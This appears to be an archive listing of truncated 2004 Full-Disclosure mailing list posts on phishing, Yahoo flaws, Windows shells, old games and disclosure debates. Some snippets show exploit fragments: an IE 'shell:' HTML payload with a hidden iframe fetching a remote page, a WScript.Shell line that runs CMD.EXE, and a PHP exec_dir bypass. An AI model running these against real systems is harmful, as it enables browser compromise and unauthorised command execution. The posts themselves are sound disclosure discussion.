Hi,
[Since phishing seems to be all the rage today, I feel compelled to add...]
Babak Pasdar wrote:
We have uncovered a phishing scam. This is a perfect example of a
phishing scam. All indicators (that the recipient sees) show a valid and
legitimate e-mail from Wells Fargo. This e-mail tells
On Wed, 7 Jul 2004, joe wrote:
Of course you had FORTRAN and COBOL as well but you couldn't do fun
games in those.
You mean like Adventure? I still have the original FORTRAN source for
that somewhere on a tape.
-- Dave
___
Full-Disclosure - We
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
autoMSdelete
a whole lot of shit. Notice the anxiety displayed in the overwhelming
mapping of the circuit board. Er///bored.
Do you see the three prongs a the end of the adapter that fits into the
wall socket? Do you ?? Do You?? That as I have been
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -- SIPS EXCERPT -- ADVISORY -- SIPS EXCERPT -- ADVISORY --
Wendy's Drive-up Order System Information Disclosure
Reporter: mi2g (http://www.mi2g.com/)
Date: July 07, 2004
Severity: Medium to High
Attack Class: Physical, Remote, Race Condition
Heh.. Don't worry. I won't tell this list about the numerous cookie
exploits which lead to thousands, probably millions of Yahoo!
account's being compromised last year.
If only the media had picked up on it at the time. It would have been
a massive story for people like CNet News to run. Some
OMG MY E-PENIS YOUR E-PENIS.
Jesus christ.
On Wed, 7 Jul 2004 10:03:14 +0100, System Outage
[EMAIL PROTECTED] wrote:
Heh.. Don't worry. I won't tell this list about the numerous cookie
exploits which lead to thousands, probably millions of Yahoo!
account's being compromised last year.
If
On Tue, 6 Jul 2004 19:08:04 -0700 (PDT), VX Dude [EMAIL PROTECTED] wrote:
I would just like to point out that some of us who use
yahoo enjoy their security holes, if they didnt have
such security holes we move on to using something like
gmail!
So please, stop telling yahoo, if they really
oh shi--
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Wednesday, July 07, 2004 8:06 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] Wendy's Drive-up Order System Information
ATTENTION,
We have uncovered a phishing scam. This is a perfect example of a
phishing scam. All indicators (that the recipient sees) show a valid and
legitimate e-mail from Wells Fargo. This e-mail tells the user their
account has been frozen due to fraudulent activity and gives them a
My understanding is that McDonalds is recommending the abandonment of
Wendy's as a late-night drive-thru and adoption of it as an alternative
eatery.
Wendy's is rapidly preparing a fix, which involves PGP PKI. You *will* have
to email your public key to Wendy's in order to submit or confirm your
There are no products to protect against phishing other than user
education and vigilance along with refining the current model for mail.
Sender ID would have blocked this because of the fraudulent From: header, even assuming
it wasn't blocked because of envelope problems.
This is yet another
On Wed, 7 Jul 2004 19:54:59 +1000, Geoffrey Huntley [EMAIL PROTECTED] wrote:
OMG MY E-PENIS YOUR E-PENIS.
Jesus christ.
Yahoo! spend very little time preventing security blunders from
happening. They would rather wait until the problem comes to them than
preventing the whole thing from ever
On Wed, 7 Jul 2004, joe wrote:
because the *nixs are picking up a lot of the people who were previously
clueless in Windows and they aren't learning much going to *nix. They just
think it is better and more secure because they know even less about it than
they did about Windows.
At least in
On Wed, Jul 07, 2004 at 07:40:59AM -0400, Rob Keown wrote:
Wendy's is rapidly preparing a fix, which involves PGP PKI. You *will* have
to email your public key to Wendy's in order to submit or confirm your
order.
I've heard that whether or not you need PGP depends on your condiment
selection.
Actually many games in Fortran appeared on DECUS sigtapes and
library media over the years. Pacman, invaders, adventure, many more.
The ones I recall used VT100 graphics but were eminently playable. Even
a version of the original Spacewar was at one time available in Fortran.
(I used to have it
This mail was a fake again :
http://lists.netsys.com/pipermail/full-disclosure/2004-July/023409.html
I suppose those mails are made by a team named No.Disclosure.
I'm sorry for them.
bye
Germain Randaxhe aka [EMAIL PROTECTED]
_
A la
joe wrote:
It is a core component of the current Windows UI, this is not the same as
being a core component of Windows. Explorer is simply a UI shell that sits
on the operating system known as Windows. The entire shell is replaceable
and has been for a long time, since at least Win3.1.
I
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Bruce Ediger
Sent: 07 July 2004 13:41
To: [EMAIL PROTECTED]
Subject: [EMAIL PROTECTED] - Email found in subject - RE:
[Full-Disclosure] IE Web Browser: Sitting Duck
snip
At least in practice
ActuallyTRS-DOS is still superior to all-y'all's stupid OS's!
So there!
:)
Ducking
---
Pete Fanning
MATC Technical Services
Internet: [EMAIL PROTECTED]
Barry Fitzgerald [EMAIL PROTECTED] 7/7/2004 8:55:50 AM
p.s. Come on people. We went through the what does an OS really
constitute?
Holy crap, I can not believe I totally forgot about adventure...
We took it straight away and ported it to BASIC-PLUS because on RSTS/E that
was one of the RTSs (shell if you will) and was interpreted so we could
change it without sending it to batch overnight for the compile like we had
to do
McDonalds, Wendys and Burger King use(d) regular business bands for
their headset.
As a kid with access to HAM radio equipment, we'd sit in the parking lot
and act as a 'go between' for them. Many an order turned up completely
wrong. Watching the kid in the drive through wonder why someone else
I don't think anyone can propose a realistic test at this point in time. I
don't think one is possible until you get some sort of large non-techno
weenie installed based going for the *nix or another OS for that matter. As
another poster pointed out, the diversity and chaos in the open source
Actually MS does support the use of alternative shells. However you couldn't
and shouldn't expect that if you have a say Thunderbird shell that MS would
support that shell, just the pinnings under it. Just like they don't support
say, Lotus, but they do support the underlying OS API calls.
As
-snip--
centerbrbrimg src=nocigar.gif/center
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none
[customise as you see fit]
i played adventure for the first time in 1975, Sept.
my greatest achievement at UW, was that for one month I was the
Adventure champion closing the cave in the fewest moves.
I got lucky, it drove the sysadmin, Unix research version 2.2,
crazy, until he hacked the source and found all the keywords
i played adventure for the first time in 1975, Sept.
my greatest achievement at UW, was that for one month I was the
Adventure champion closing the cave in the fewest moves.
bla bla bla bla bla
http://www.graphicupstart.com/clients/misc/stfu.jpg
Thank you
This is dangerous. Based on the file extension of the shell protocol
different applications may be launched. For example:
shell:.its will launch Internet Explorer
and shell:.mp3 will launch Winamp.
The trick is to find an application that will overflow when given a
very long parameter. A quick
Thanks Nick, you should find this corrected now.
joe
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Nick FitzGerald
Sent: Saturday, July 03, 2004 1:00 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: [Full-Disclosure] What a
I just verified this in Mozilla 1.7 on Windows XP pro.
(I know -- no reason why it shouldn't work on 1.7 if it worked on firefox)
In any case, it does appear to be an issue with MS Windows and not
Mozilla, but the Mozilla project should still, IMO, filter out the
shell: scheme type and other
In lines with this email thread and if anyone is interested in playing with
an alternate shell... I went poking around and found what looks to be an
interesting GNU replacement shell. Note that they specifically point out
this isn't for novice users.
You can find info at
Information Week just posted an article titled Disclosure: Security
Pros Want Flaw Information Sooner in which they surveyed 7,000
business technogology and security professionals. 66% argued for
immediate disclosure upon discovery, and another 32% wanted disclosure
once a patch was available,
Hello,
Does anyone know the security contact for Rediff.com,
Indiatimes.com or Sify.com? Please let me know if you
do.
--
S.G.Masood
__
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!
http://promotions.yahoo.com/new_mail
I. SUMMARY
The Chapters/Indigo website (http://www.chapters.indigo.ca/) is vulnerable
to user name guessing at the login screen and personal information leaks
(name and address) in the Wish List function.
II. BACKGROUND
Chapters/Indigo is the largest book vendor in Canada, having over C$800M
Citando Adam Laurie [EMAIL PROTECTED]:
i have just installed an adsl modem sold under the brand of Zoom X3
http://www.zoom.com/products/adsl_overview.html
and was apalled to find that an nmap scan of the external address
immediately came up with the following:
PORTSTATE SERVICE
On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
-snip--
centerbrbrimg src=nocigar.gif/center
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none
[customise as
Php-exec-dir been fixed for those who care.
http://kyberdigi.cz/projects/execdir/english.html for those who need english
heh
Bugs
VeNoMouS reported that you can execute commands out of specified directories
if you prepend a ';' character to the beginning of the command and try to
execute it
Microsoft HIDES certain types of files from your eyes:
This one is old unpatched "behaviour" ...
If you will create in windows explorer file :
test.txt
with content :
scripta=new ActiveXObject("WSCript.Shell");a.run("CMD.EXE");alert("Hello, I'mSilly Billy!");/script
It will be executed if you
Ancient news
http://www.guninski.com/clsidext.html
--jelmer
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Good One
Sent: donderdag 8 juli 2004 1:37
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Microsoft hides certain types of files from your
?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?
^^ do a |spaceps exploits it again
i my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing inside
it and i was still able to execute it, you HAVE to do the space after the
pipe '|'.
- Original Message -
From: C. McCohy
Hello list,
I have found a vulnerability with Nokia's 3560 cellular phone, in which anyone may
remotely crash the phone's OS, requiring the user to disconnect the battery to restore
normal functionality. The attack only requires sending the person a specially crafted
text message. This
40 matches
Mail list logo